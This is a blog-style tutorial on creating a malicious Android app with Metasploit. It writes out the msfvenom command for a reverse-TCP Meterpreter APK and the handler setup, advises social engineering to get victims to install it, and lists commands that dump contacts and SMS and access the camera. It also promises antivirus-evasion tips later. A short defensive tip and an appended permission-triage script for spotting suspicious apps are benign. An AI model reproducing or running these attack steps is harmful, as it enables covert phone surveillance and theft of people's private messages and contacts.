How To Create a Malicious App for Android

So, I recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious app!

What else would we use other than Metasploit?

So we fire up the console like so…

service postgresql start

msfconsole

First we need to create the malicious .apk file, so open another terminal window and use the following, making sure you enter your IP and port number after the “=” symbols.

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk

You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.

In the first window, the one running Metasploit, we now start a handler which will “listen” for the connection attempt that is launched when our app is installed and used. We do this like so.

use exploit/multi/handler

Then we need to set the IP, port and payload. The port and IP need to be the same as those set in the previous step when using msfvenom.

set LHOST xx.xx.xx.xx

set LPORT xxxx

set PAYLOAD android/meterpreter/reverse_tcp

We can check what is required for an exploit at any time once it is loaded by running

show options

We now have everything we need configured, so we can start the “listener”.

run

Then we use social engineering to try and get someone to install and run it.

When they do, you will see the connection come back from the phone.

In this example we got 2 connections! We can list them with this command

sessions -i

We can then connect by using the same command but choosing which session we want to connect to.

sessions 1

And then quickly get some info to confirm the device.

sysinfo

Then we can quickly dump info from the phone immediately using the dump commands

dump_contacts

dump_sms

You can also capture a screenshot, take a photo from either camera, or even stream live from either camera on the device. Scary huh?

If you have NO antivirus on your Android, and you have disabled the “verify app” feature, then this simple app will run without any issues.

If you have an Android phone, enable the app verifier, and get some antivirus to at least give yourself a fighting chance!
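
For the defensive side, a quick permission triage, added here as an example and not part of the original post: it parses the text printed by `aapt dump permissions <apk>` and flags an app that can read private data (contacts, SMS, camera) and also reach the network. The sample outputs, package names and the `min_private` threshold are constructed assumptions.

```python
import re

# Permissions an app must declare for the capabilities the post demonstrates.
CAPABILITY_PERMS = {
    "contacts": {"android.permission.READ_CONTACTS"},
    "sms": {"android.permission.READ_SMS"},
    "camera": {"android.permission.CAMERA"},
    "network": {"android.permission.INTERNET"},
}

# Accepts both the quoted name='android.permission.X' form and the bare form.
PERM_RE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=)?'?([\w.]+)")

def parse_permissions(aapt_output):
    """Return the set of permission names declared in `aapt dump permissions` text."""
    perms = set()
    for line in aapt_output.splitlines():
        m = PERM_RE.match(line.strip())
        if m:
            perms.add(m.group(1))
    return perms

def triage(aapt_output, min_private=2):
    """Flag apps that can read several kinds of private data and reach the network."""
    perms = parse_permissions(aapt_output)
    caps = sorted(c for c, need in CAPABILITY_PERMS.items() if need <= perms)
    private = [c for c in caps if c != "network"]
    # min_private is an assumed threshold, not a standard; tune it for your fleet.
    return {"capabilities": caps,
            "suspicious": "network" in caps and len(private) >= min_private}

# Constructed sample: an app named "flashlight" asking for far more than a torch needs.
SAMPLE_SUSPECT = """package: com.example.flashlight
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.CAMERA'
"""

# Constructed sample in the bare format: camera plus network only.
SAMPLE_BENIGN = """package: com.example.torch
uses-permission: android.permission.CAMERA
uses-permission: android.permission.INTERNET
"""

if __name__ == "__main__":
    for name, text in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(name, triage(text))
```

A hit is a reason to look closer before installing, not proof of malice; plenty of legitimate messaging apps request the same set.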

There will be a follow-up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by antivirus. That’s it for now though.